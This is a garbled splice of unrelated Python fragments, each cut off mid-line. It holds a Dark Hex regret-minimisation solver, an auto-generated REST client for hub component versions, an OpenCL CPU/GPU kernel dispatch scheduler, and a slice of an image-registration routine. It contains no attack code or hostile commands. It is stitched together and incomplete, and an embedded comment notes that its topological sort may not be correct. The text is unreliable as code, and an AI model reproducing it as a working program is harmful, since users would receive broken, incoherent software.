                        children = []
                        # * update the board with action a and add the new
                        # * board state to the -children- to traverse later
                        new_board = self.__placeStone(node.board, a, node.player)
                        if not new_board:
                            continue
                        children.append(get_infoset(new_board, node.h))
                        if node.h > 0:
                            new_board = self.__placeStone(node.board, a, rev_player)
                            if not new_board:
                                continue
                            children.append(get_infoset(new_board, node.h-1))
                        for _, infoset_c in enumerate(children):
                            if infoset_c in self.nodes_dict:
                                # utility is from the mover's perspective:
                                # negate when the child belongs to the opponent
                                if self.nodes_dict[infoset_c].player == node.player:
                                    childUtil = self.nodes_dict[infoset_c].u
                                else:
                                    childUtil = - self.nodes_dict[infoset_c].u
                                node.regrets[a] += childUtil
                                node.u += strategy[a] * childUtil
                    # counterfactual reach probability = opponent's reach mass
                    cfp = node.pSum2 if node.player == pieces.kBlack else node.pSum1
                    for a in node.pos_actions:
                        # visit-weighted running average of regrets
                        nomin = (node.T * node.regretSum[a] + node.visits * cfp * (node.regrets[a] - node.u))
                        denom = node.T + node.visits
                        node.regretSum[a] = nomin / denom
                node.T += node.visits
                node.visits = 0
                node.pSum1 = 0
                node.pSum2 = 0
            # reset the strategysums - page 32
            if it == num_of_iterations//2:
                for node in self.nodes:
                    for a in range(len(node.strategySum)):
                        node.strategySum[a] = 0
        # for node in self.nodes:
        #     if not node.is_terminal:
        #         print(node.infoSet, node.getAverageStrategy())

    def __init_board_topSorted(self) -> tuple:
        """Enumerate all reachable information sets by exhaustive play, then
        return (top_sorted node list, infoset -> Node dict)."""
        # TODO: Remove more states using pONE
        stack = []; nodes_dict = {}; visited = defaultdict(lambda: False)
        game = DarkHex([self.num_rows, self.num_cols], False)
        # create a root node for graph representation
        root = Node(game.BOARD, [], pieces.kBlack, 0, 0)
        self.__topSort_play(game, root.infoSet, '=', stack, visited, nodes_dict)
        print("Phase 1 has ended...")
        print("{} number of unique states".format(len(nodes_dict)))
        # topologically sort the nodes_dict using childrens of indexes
        top_sorted = self.top_sort(nodes_dict)
        return top_sorted, nodes_dict

    def top_sort(self, nodes_dict: dict):
        '''
        Topologically sorting given dictionary based on child-parent
        relationship. Returns a list of nodes in topological order.

        NOTE(review): this sorts by parent count (in-degree) and reverses,
        which is NOT a true topological sort in general (e.g. Kahn's
        algorithm); it may only coincide with one for this DAG — verify.
        '''
        for node in nodes_dict:
            for child in nodes_dict[node].children:
                nodes_dict[child.infoSet].parents.append(node)
        # sort the nodes based on the parents
        sorted_nodes = sorted(nodes_dict.values(), key=lambda x: len(x.parents))
        # reverse the list to get the top-sorted list
        nodes = sorted_nodes[::-1]
        # print nodes in order
        # for node in nodes:
        #     print(node.infoSet)
        return nodes

    def __topSort_play(self, game, root_info, res, stack, visited, nodes_dict) -> None:
        """Depth-first exhaustive play that records every reachable
        information set in nodes_dict and wires parent->child links."""
        # player = game.turn_info
        player = game.turn_information_func()
        # * Given a game, return the top-sorted full states
        # -------------------------------------------------
        # -> Create the node for the current game&player
        # -> Player plays every possible action
        # -> Call the next game
        # -> Save the infoSet + node
        # Full (both-boards) state key: dedupes states across both players'
        # partial views.
        ext_infoSet = tuple([*game.BOARDS[pieces.kBlack], *game.BOARDS[pieces.kWhite]])
        if res == pieces.kFail:
            # The previous move hit a hidden stone: same player moves again.
            node = Node(board=game.BOARDS[player],
                        move_history=game.move_history[player],
                        player=player,
                        h=game.hidden_stones_count(player),
                        turn_num=game.game_length)
            # ext_infoSet = get_infoset(node.board, node.h)
            if visited[ext_infoSet]:
                return
            else:
                visited[ext_infoSet] = True
        else:
            # * CREATING THE NODE *********
            if res != pieces.kDraw:
                # If the game is over, switch player so
                # we get the ending players node
                player = res
            new_h = game.hidden_stones_count(player)
            node = Node(board=game.BOARDS[player],
                        move_history=game.move_history[player],
                        player=player,
                        h=new_h,
                        turn_num=game.game_length)
            node.is_terminal = res != pieces.kDraw
            # *******************************
            if visited[ext_infoSet]:
                return
            else:
                visited[ext_infoSet] = True
            if node.is_terminal:
                if node.infoSet not in nodes_dict:
                    nodes_dict[node.infoSet] = node
                    stack.append(node)
                nodes_dict[root_info].children.append(node)
                # root.children.append(node)
                return
        valid_moves = copy(game.valid_moves_colors[player])
        for a in valid_moves:
            _, res, _ = game.step(player, a)
            if node.infoSet not in nodes_dict:
                nodes_dict[node.infoSet] = node
                stack.append(node)
            if root_info != node.infoSet:
                nodes_dict[root_info].children.append(node)
                # root.children.append(node)
            self.__topSort_play(game, node.infoSet, res, stack, visited, nodes_dict)
            # undo the move; a kFail rewind restores the same-player turn
            game.rewind(res == pieces.kFail)
        return

    def __placeStone(self, board, cell, color):
        '''
        Placing a stone on the board and returning the new board.
        Stones are stored with edge-connectivity tags (North/South for Black,
        East/West for White) so a win is detected locally; a flood-fill
        propagates a newly acquired tag to the connected group.

        Args:
            board: current board
            cell: cell to place the stone on
            color: color of the stone
        Returns:
            new board, or False if the cell is occupied
        '''
        new_board = deepcopy(board)
        # first check if the cell is empty
        # if not return False
        if new_board[cell] != pieces.kEmpty:
            return False
        if color == pieces.kBlack:
            north_connected = False
            south_connected = False
            if cell < self.num_cols:  # First row
                north_connected = True
            elif cell >= self.num_cols * (self.num_rows - 1):  # Last row
                south_connected = True
            for neighbour in self._cell_connections(cell):
                if new_board[neighbour] == pieces.kBlackNorth:
                    north_connected = True
                elif new_board[neighbour] == pieces.kBlackSouth:
                    south_connected = True
            if north_connected and south_connected:
                new_board[cell] = pieces.kBlackWin
            elif north_connected:
                new_board[cell] = pieces.kBlackNorth
            elif south_connected:
                new_board[cell] = pieces.kBlackSouth
            else:
                new_board[cell] = pieces.kBlack
        elif color == pieces.kWhite:
            east_connected = False
            west_connected = False
            if cell % self.num_cols == 0:  # First column
                west_connected = True
            elif cell % self.num_cols == self.num_cols - 1:  # Last column
                east_connected = True
            for neighbour in self._cell_connections(cell):
                if new_board[neighbour] == pieces.kWhiteWest:
                    west_connected = True
                elif new_board[neighbour] == pieces.kWhiteEast:
                    east_connected = True
            if east_connected and west_connected:
                new_board[cell] = pieces.kWhiteWin
            elif east_connected:
                new_board[cell] = pieces.kWhiteEast
            elif west_connected:
                new_board[cell] = pieces.kWhiteWest
            else:
                new_board[cell] = pieces.kWhite
        if new_board[cell] in [pieces.kBlackWin, pieces.kWhiteWin]:
            return new_board
        elif new_board[cell] not in [pieces.kBlack, pieces.kWhite]:
            # The cell is connected to an edge but not a win position.
            # We need to use flood-fill to find the connected edges.
            flood_stack = [cell]
            latest_cell = 0
            while len(flood_stack) != 0:
                latest_cell = flood_stack.pop()
                for neighbour in self._cell_connections(latest_cell):
                    if new_board[neighbour] == color:
                        new_board[neighbour] = new_board[cell]
                        flood_stack.append(neighbour)
            # Flood-fill is complete.
        return new_board

    def _cell_connections(self, cell):
        '''
        Returns the neighbours of the
`create_component_version_stage`") # noqa: E501 # verify the required parameter 'name' is set if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501 local_var_params['name'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `name` when calling `create_component_version_stage`") # noqa: E501 # verify the required parameter 'body' is set if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501 local_var_params['body'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `body` when calling `create_component_version_stage`") # noqa: E501 collection_formats = {} path_params = {} if 'owner' in local_var_params: path_params['owner'] = local_var_params['owner'] # noqa: E501 if 'entity' in local_var_params: path_params['entity'] = local_var_params['entity'] # noqa: E501 if 'name' in local_var_params: path_params['name'] = local_var_params['name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKey'] # noqa: E501 return self.api_client.call_api( '/api/v1/{owner}/hub/{entity}/versions/{name}/stages', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='V1Stage', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), 
_request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats) def delete_component_hub(self, owner, name, **kwargs): # noqa: E501 """Delete hub component # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_component_hub(owner, name, async_req=True) >>> result = thread.get() :param async_req bool: execute request asynchronously :param str owner: Owner of the namespace (required) :param str name: Component under namesapce (required) :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True return self.delete_component_hub_with_http_info(owner, name, **kwargs) # noqa: E501 def delete_component_hub_with_http_info(self, owner, name, **kwargs): # noqa: E501 """Delete hub component # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_component_hub_with_http_info(owner, name, async_req=True) >>> result = thread.get() :param async_req bool: execute request asynchronously :param str owner: Owner of the namespace (required) :param str name: Component under namesapce (required) :param _return_http_data_only: response data without head status code and headers :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. 
It can also be a pair (tuple) of (connection, read) timeouts. :return: None If the method is called asynchronously, returns the request thread. """ local_var_params = locals() all_params = [ 'owner', 'name' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method delete_component_hub" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'owner' is set if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501 local_var_params['owner'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `owner` when calling `delete_component_hub`") # noqa: E501 # verify the required parameter 'name' is set if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501 local_var_params['name'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `name` when calling `delete_component_hub`") # noqa: E501 collection_formats = {} path_params = {} if 'owner' in local_var_params: path_params['owner'] = local_var_params['owner'] # noqa: E501 if 'name' in local_var_params: path_params['name'] = local_var_params['name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKey'] # noqa: E501 return self.api_client.call_api( '/api/v1/{owner}/hub/{name}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), 
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_component_version(self, owner, entity, name, **kwargs):  # noqa: E501
        """Delete component version  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_component_version(owner, entity, name, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str owner: Owner of the namespace (required)
        :param str entity: Entity: project name, hub name, registry name, ... (required)
        :param str name: Sub-entity name (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin convenience wrapper: callers get only the payload (None here),
        # not the (data, status, headers) tuple of the *_with_http_info variant.
        kwargs['_return_http_data_only'] = True
        return self.delete_component_version_with_http_info(owner, entity, name, **kwargs)  # noqa: E501

    def delete_component_version_with_http_info(self, owner, entity, name, **kwargs):  # noqa: E501
        """Delete component version  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_component_version_with_http_info(owner, entity, name, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str owner: Owner of the namespace (required)
        :param str entity: Entity: project name, hub name, registry name, ... (required)
        :param str name: Sub-entity name (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """

        # Snapshot of explicit args plus **kwargs, used for uniform validation below.
        local_var_params = locals()

        all_params = [
            'owner',
            'entity',
            'name'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )

        # Reject any keyword argument this endpoint does not know about.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_component_version" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'owner' is set
        if self.api_client.client_side_validation and ('owner' not in local_var_params or  # noqa: E501
                                                       local_var_params['owner'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `owner` when calling `delete_component_version`")  # noqa: E501
        # verify the required parameter 'entity' is set
        if self.api_client.client_side_validation and ('entity' not in local_var_params or  # noqa: E501
                                                       local_var_params['entity'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `entity` when calling `delete_component_version`")  # noqa: E501
        # verify the required parameter 'name' is set
        if self.api_client.client_side_validation and ('name' not in local_var_params or  # noqa: E501
                                                       local_var_params['name'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `name` when calling `delete_component_version`")  # noqa: E501

        collection_formats = {}

        # Values substituted into '/api/v1/{owner}/hub/{entity}/versions/{name}'.
        path_params = {}
        if 'owner' in local_var_params:
            path_params['owner'] = local_var_params['owner']  # noqa: E501
        if 'entity' in local_var_params:
            path_params['entity'] = local_var_params['entity']  # noqa: E501
        if 'name' in local_var_params:
            path_params['name'] = local_var_params['name']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKey']  # noqa: E501

        return self.api_client.call_api(
            '/api/v1/{owner}/hub/{entity}/versions/{name}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_component_hub(self, owner, name, **kwargs):  # noqa: E501
        """Get hub component  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_component_hub(owner, name, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str owner: Owner of the namespace (required)
        :param str name: Component under namesapce (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding
queue: OpenCL Command Queue :type queue: pyopencl.CommandQueue :param q_id: Framework specific id assigned to Command Queue :type q_id: Integer :param obj: OpenCL Device Type :type obj: String :param size_percent: Percentage of problem space to be processed :type size_percent: Integer :param offset_percent: Percentage for offset required for selection of host array space to be copied to buffer :type offset_percent: Integer :param deps: PyOpenCL Event on which subsequent ndrange operations will be dependent on stored in a list :type deps: list of pyopencl.Event Objects :param callback: Custom callback function :type callback: python function :param kwargs: :type kwargs: :return: Barrier Event signifying end of read operation :rtype: pyopencl.event """ oev, ioev = [None] * len(self.output_buffers[obj]), [None] * len(self.io_buffers[obj]) logging.debug("PARTITION : Enqueuing Read Buffers %s",obj) depends = [None] * (len(self.output_buffers[obj]) + len(self.io_buffers[obj])) if len(depends) == 0: depends = [None] if deps: depends[0] = deps kwargs['host_event'].read_start = time.time() for i in range(len(self.output_buffers[obj])): if self.buffer_info['output'][i]['enq_read']: eo, ne = self.get_slice_values(self.buffer_info['output'][i], size_percent, offset_percent, **kwargs) logging.debug("PARTITION_%s : %s Enqueue_Read_Output_Buffers_element_offset : %s", obj, self.name, eo) logging.debug("PARTITION_%s : %s Enqueue_Read_Output_Buffers_number_of_elements : %s", obj, self.name, ne) oev[i] = cl.enqueue_copy(queue, self.data['output'][i][eo:eo + ne], self.output_buffers[obj][i], is_blocking=False, wait_for=depends[i]) j = len(self.output_buffers[obj]) for i in range(len(self.io_buffers[obj])): if self.buffer_info['io'][i]['enq_read']: eo, ne = self.get_slice_values(self.buffer_info['io'][i], size_percent, offset_percent, **kwargs) logging.debug("PARTITION_%s : %s Enqueue_Read_IO_Buffers_element_offset : %s", obj, self.name, eo) logging.debug("PARTITION_%s : %s 
Enqueue_Read_IO_Buffers_number_of_elements : %s", obj, self.name, ne) ioev[i] = cl.enqueue_copy(queue, self.data['io'][i][eo:eo + ne], self.io_buffers[obj][i], is_blocking=False, wait_for=depends[i + j]) oev.extend(ioev) logging.debug("PARTITION : Number of read buffers %d" % (len(oev))) barrier_event = cl.enqueue_barrier(queue, wait_for=oev) barrier_event.set_callback(cl.command_execution_status.COMPLETE, notify_callback(self, obj, q_id, 'READ', oev,host_event_info=kwargs['host_event'], callback=callback)) return barrier_event def dispatch(self, gpu, cpu, ctxs, cmd_qs, lw_callback = False ,dep=None, partition=None, callback=blank_fn, **kwargs): """ Dispatches Kernel with given partition class value (0,1,2,...,10). 0 is for complete CPU and 10 is for complete GPU. :param gpu: Denotes the index of gpu device in cmd_qs['gpu'] list or is -1 if we don't want to use device of this type. :type gpu: Integer :param cpu: Denotes the index of cpu device in cmd_qs['cpu'] list or is -1 if we don't want to use device of this type. :type cpu: Integer :param ctxs: Dictionary of Contexts for CPU and GPU devices. :type ctxs: dict :param cmd_qs: Dictionary of list of Command Queues :type cmd_qs: dict :param lw_callback : Set to true if callback should be initiated only for WRITE for each command queue on each device :type : bool :param dep: PyOpenCL Event on which subsequent write operations will be dependent on stored in a list :param partition: Integer from 0 to 10 or None denoting partition class value. :type partition: Integer :param callback: A function that will run on the host side once the kernel completes execution on the device. Handle unexpected arguments. 
:return: Tuple with first element being the starting time (host side) of dispatch and second element being list of kernel events for both CPU and GPU devices :rtype: Tuple """ dispatch_start = time.time() logging.debug("DISPATCH : Dispatch function call for %s starts at %s", self.name, dispatch_start) gpu_host_events = HostEvents(self.name, self.id, dispatch_start=dispatch_start) cpu_host_events = HostEvents(self.name, self.id, dispatch_start=dispatch_start) self.lw_callback = lw_callback self.cb_events = {} if not lw_callback: for key in cmd_qs: n = len(cmd_qs[key]) self.cb_events[key] = [] for _ in range(n): self.cb_events[key].append({"write_done": threading.Event(),"kernel_done" : threading.Event()}) if partition is not None: self.partition = partition if dep: deps = dep else: deps = {key: cl.UserEvent(ctxs[key]) for key in ['cpu', 'gpu']} if gpu != -1 and cpu != -1: size_percent = self.partition * 10 elif gpu == -1 and cpu != -1: size_percent = 0 self.partition = 0 elif cpu == -1 and gpu != -1: size_percent = 100 self.partition = 10 else: return None, None gdone, cdone = [], [] if self.partition not in [0, 10]: self.chunks_left = 2 if gpu != -1 and self.partition != 0: dispatch_id = generate_unique_id() # while test_and_set(0, 1): # pass rqLock.acquire() global nGPU nGPU -= 1 #rqlock[0] = 0 rqLock.release() offset_percent = 0 logging.debug("DISPATCH_gpu : Evaluation of kernel arguments for %s on GPU", self.name) self.eval_vargs(size_percent=size_percent, offset_percent=offset_percent) gpu_host_events.create_buf_start = time.time() logging.debug("DISPATCH_gpu : Creation of buffers for %s on GPU", self.name) self.create_buffers(ctxs['gpu'], 'gpu', size_percent, offset_percent) gpu_host_events.create_buf_end = time.time() logging.debug("DISPATCH_gpu : Setting kernel arguments for %s on GPU", self.name) self.set_kernel_args('gpu') logging.debug("DISPATCH_gpu :Calling enqueue_write_buffers for GPU") gdone.append(self.enqueue_write_buffers(cmd_qs['gpu'][gpu], gpu, 
'gpu', size_percent, offset_percent, deps=[deps['gpu']], did=dispatch_id, host_event=gpu_host_events)) logging.debug("DISPATCH_gpu : Calling enqueue_nd_range_kernel for GPU") gdone.append( self.enqueue_nd_range_kernel(cmd_qs['gpu'][gpu], gpu, 'gpu', size_percent, 0, deps=[gdone[-1]], did=dispatch_id, host_event=gpu_host_events,C=kwargs['C_gpu'])) logging.debug("DISPATCH_gpu : Calling enqueue_read_buffers for GPU") gdone.append(self.enqueue_read_buffers(cmd_qs['gpu'][gpu], gpu, 'gpu', size_percent, offset_percent, deps=[gdone[-1]], callback=callback, did=dispatch_id, host_event=gpu_host_events)) if cpu != -1 and self.partition != 10: # while test_and_set(0, 1): # pass rqLock.acquire() global nCPU nCPU -= 1 #rqlock[0] = 0 rqLock.release() dispatch_id = generate_unique_id() offset_percent = size_percent size_percent = 100 - size_percent logging.debug("DISPATCH_cpu : Evaluation of kernel arguments for %s on CPU", self.name) self.eval_vargs(size_percent=size_percent, offset_percent=offset_percent) logging.debug("DISPATCH_cpu : Calling creating_buffers for %s on CPU", self.name) cpu_host_events.create_buf_start = time.time() self.create_buffers(ctxs['cpu'], 'cpu', size_percent, offset_percent) cpu_host_events.create_buf_end = time.time() logging.debug("DISPATCH_cpu : Calling set_kernel_args for %s on CPU", self.name) self.set_kernel_args('cpu') logging.debug("DISPATCH_cpu : Calling enqueue_write_buffers for %s on CPU", self.name) cdone.append(self.enqueue_write_buffers(cmd_qs['cpu'][cpu], cpu, 'cpu', size_percent, offset_percent, deps=[deps['cpu']], did=dispatch_id, host_event=cpu_host_events)) logging.debug("DISPATCH_cpu : Evaluation of enqueue_nd_range_kernel for %s on CPU", self.name) cdone.append( self.enqueue_nd_range_kernel(cmd_qs['cpu'][cpu], cpu, 'cpu', size_percent, 0, deps=[cdone[-1]], did=dispatch_id, host_event=cpu_host_events, C=kwargs['C_cpu'])) logging.debug("DISPATCH_cpu : Evaluation of enqueue_read_buffers for %s on CPU", self.name) 
cdone.append(self.enqueue_read_buffers(cmd_qs['cpu'][cpu], cpu, 'cpu', size_percent, offset_percent, deps=[cdone[-1]], callback=callback, did=dispatch_id, host_event=cpu_host_events)) if not dep: for key in ['gpu', 'cpu']: deps[key].set_status(cl.command_execution_status.COMPLETE) start_time = time.time() logging.debug("DISPATCH : %s ke.dispatch_end %s ", self.name, start_time) logging.debug("DISPATCH : Evaluation of kernel arguments for %s ", self.name) logging.debug("DISPATCH : Number of events %d" % (len(gdone + cdone))) cmd_qs['gpu'][gpu].flush() cmd_qs['cpu'][cpu].flush() dispatch_end = time.time() logging.debug("DISPATCH : Dispatch function call for %s ends at %s", self.name, dispatch_end) return start_time, gdone + cdone ###########################################TODO######################################################### def enqueue_write_buffers_dag(self, task , h , queue, q_id, obj, n_chunks=1, chunk_number=0, deps=None, **kwargs): """ Enqueues list of write buffer operations to the OpenCL Runtime. 
        :param queue: Command Queue for a CPU or a GPU device
        :type queue: pyopencl.CommandQueue
        :param q_id: ID of queue
        :type q_id: Integer
        :param obj: Device Type (CPU or GPU)
        :type obj: String
        :param size_percent: Percentage of problem space to be processed
        :type size_percent: Integer
        :param offset_percent: Percentage for offset required for selection of host array space
         to be copied to buffer
        :type offset_percent: Integer
        :param deps: Initial PyOpenCL Event on which subsequent write operations will be dependent
         stored in a list
        :type deps: list of pyopencl.Event Objects
        :param kwargs:
        :type kwargs:
        :return: Barrier Event signifying end of write operation
        :rtype: pyopencl.event
        """
        iev = list()
        ioev = list()
        global enque_write, duplicate_write
        # One dependency slot per (input + io) buffer; keep a single slot in the
        # degenerate case so depends[0] below is always addressable.
        depends = [None] * (len(self.input_buffers[obj]) + len(self.io_buffers[obj]))
        if len(depends) == 0:
            depends = [None]
        if deps:
            depends[0] = deps
        logging.debug("PARTITION : Enqueuing Write Buffers %s", obj)
        #kwargs['host_event'].write_start = time.time()
        start_barrier_event = cl.enqueue_barrier(queue, wait_for=depends[0])
        for i in range(len(self.input_buffers[obj])):
            if self.buffer_info['input'][i]['enq_write']:
                # 'break' == 0 marks a non-chunkable buffer: it is written whole,
                # and only together with the first chunk.
                if self.buffer_info['input'][i]['break'] == 0:
                    if chunk_number > 0:
                        continue
                    eo, ne = 0, self.buffer_info['input'][i]['size']
                else:
                    eo, ne = self.get_chunking_indices(self.buffer_info['input'][i]['size'],
                                                       chunk_number, n_chunks)
                logging.debug("PARTITION_%s : %s Enqueue_Write_Input_Buffers_element_offset : %s", obj, self.name, eo)
                logging.debug("PARTITION_%s : %s Enqueue_Write_Input_Buffers_number_of_elements : %s", obj, self.name, ne)
                # device_offset: byte offset of the slice within the device buffer,
                # computed from the host array prefix size.
                iev.append(
                    cl.enqueue_copy(queue, self.input_buffers[obj][i], self.data['input'][i][eo:eo + ne],
                                    is_blocking=False, wait_for=depends[i],
                                    device_offset=(self.data['input'][i][:eo].nbytes)))
                #logging.info("CHECKING COPYING OF DATA")
                #print "ALL INPUT ",self.data['input'][i]
                #print "INPUT BEING COPIED",self.data['input'][i][eo:eo+ne]
                duplicate_write = duplicate_write + 1
                enque_write = enque_write + 1
        # if self.input_buffers[obj]:
        #     depends = [None] * len(self.io_buffers[obj])
        j = len(self.input_buffers[obj])
        for i in range(len(self.io_buffers[obj])):
            if self.buffer_info['io'][i]['enq_write']:
                if self.buffer_info['io'][i]['break'] == 0:
                    if chunk_number > 0:
                        continue
                    eo, ne = 0, self.buffer_info['io'][i]['size']
                else:
                    eo, ne = self.get_chunking_indices(self.buffer_info['io'][i]['size'],
                                                       chunk_number, n_chunks)
                logging.debug("PARTITION_%s : %s Enqueue_Write_IO_Buffers_element_offset : %s", obj, self.name, eo)
                logging.debug("PARTITION_%s : %s Enqueue_Write_IO_number_of_elements : %s", obj, self.name, ne)
                logging.debug(str(depends) + "here")
                logging.debug(str(i + j))
                ioev.append(
                    cl.enqueue_copy(queue, self.io_buffers[obj][i], self.data['io'][i][eo:eo + ne],
                                    is_blocking=False, wait_for=depends[i + j],
                                    device_offset=self.data['io'][i][:eo].nbytes))
        iev.extend(ioev)
        logging.debug("PARTITION : Number of write buffers %d" % (len(iev)))
        # Barrier over all writes; with no writes at all we still need a barrier
        # event to return, so fall back to an unconditioned one.
        if (len(iev) == 0):
            barrier_event = cl.enqueue_barrier(queue, wait_for=None)
        else:
            barrier_event = cl.enqueue_barrier(queue, wait_for=iev)
        # if iev:
        #     iev[-1].set_callback(cl.command_execution_status.COMPLETE,
        #                          notify_callback_dag(self , obj, q_id, 'WRITE', iev, host_event_info=kwargs['host_event'] ))
        #
        # else:
        #     barrier_event.set_callback(cl.command_execution_status.COMPLETE,
        #                                notify_callback_dag(self , obj, q_id, 'WRITE', iev, host_event_info=kwargs['host_event'] ))
        self.write_events.extend(iev)
        return barrier_event

    def
* Sx + mean_dest_x coord_init_pix_scaleXinv = np.copy(coord_init_pix) coord_init_pix_scaleXinv[:, 0] = (coord_init_pix[:, 0] - mean_dest_x) / float(Sx) + mean_src_x # apply transformation to image from skimage.transform import warp row_scaleXinv = np.reshape(coord_init_pix_scaleXinv[:, 0], [nx, ny]) src2d_scaleX = warp(src2d, np.array([row_scaleXinv, col]), order=1) # ============================================================ # COLUMN-WISE REGISTRATION (Y dimension for each Xi) # ============================================================ coord_init_pix_scaleY = np.copy(coord_init_pix) # need to use np.copy to avoid copying pointer coord_init_pix_scaleYinv = np.copy(coord_init_pix) # need to use np.copy to avoid copying pointer # coord_src2d_scaleXY = np.copy(coord_src2d_scaleX) # need to use np.copy to avoid copying pointer # loop across columns (X dimension) for ix in range(nx): # retrieve 1D signal along Y src1d = src2d_scaleX[ix, :] dest1d = dest2d[ix, :] # make sure there are non-zero data in src or dest if np.any(src1d > th_nonzero) and np.any(dest1d > th_nonzero): # retrieve min/max of non-zeros elements (edge of the segmentation) # src1d_min, src1d_max = min(np.nonzero(src1d)[0]), max(np.nonzero(src1d)[0]) # dest1d_min, dest1d_max = min(np.nonzero(dest1d)[0]), max(np.nonzero(dest1d)[0]) # 1D matching between src_y and dest_y # Ty = (dest1d_max + dest1d_min)/2 - (src1d_max + src1d_min)/2 # Sy = (dest1d_max - dest1d_min) / float(src1d_max - src1d_min) # apply translation and scaling to coordinates in column # get indices (in continuous space) at half-maximum of upward and downward slope # src1d_min, src1d_max = find_index_halfmax(src1d) # dest1d_min, dest1d_max = find_index_halfmax(dest1d) src1d_min, src1d_max = np.min(np.where(src1d > th_nonzero)), np.max(np.where(src1d > th_nonzero)) dest1d_min, dest1d_max = np.min(np.where(dest1d > th_nonzero)), np.max(np.where(dest1d > th_nonzero)) # 1D matching between src_y and dest_y mean_dest_y = (dest1d_max + 
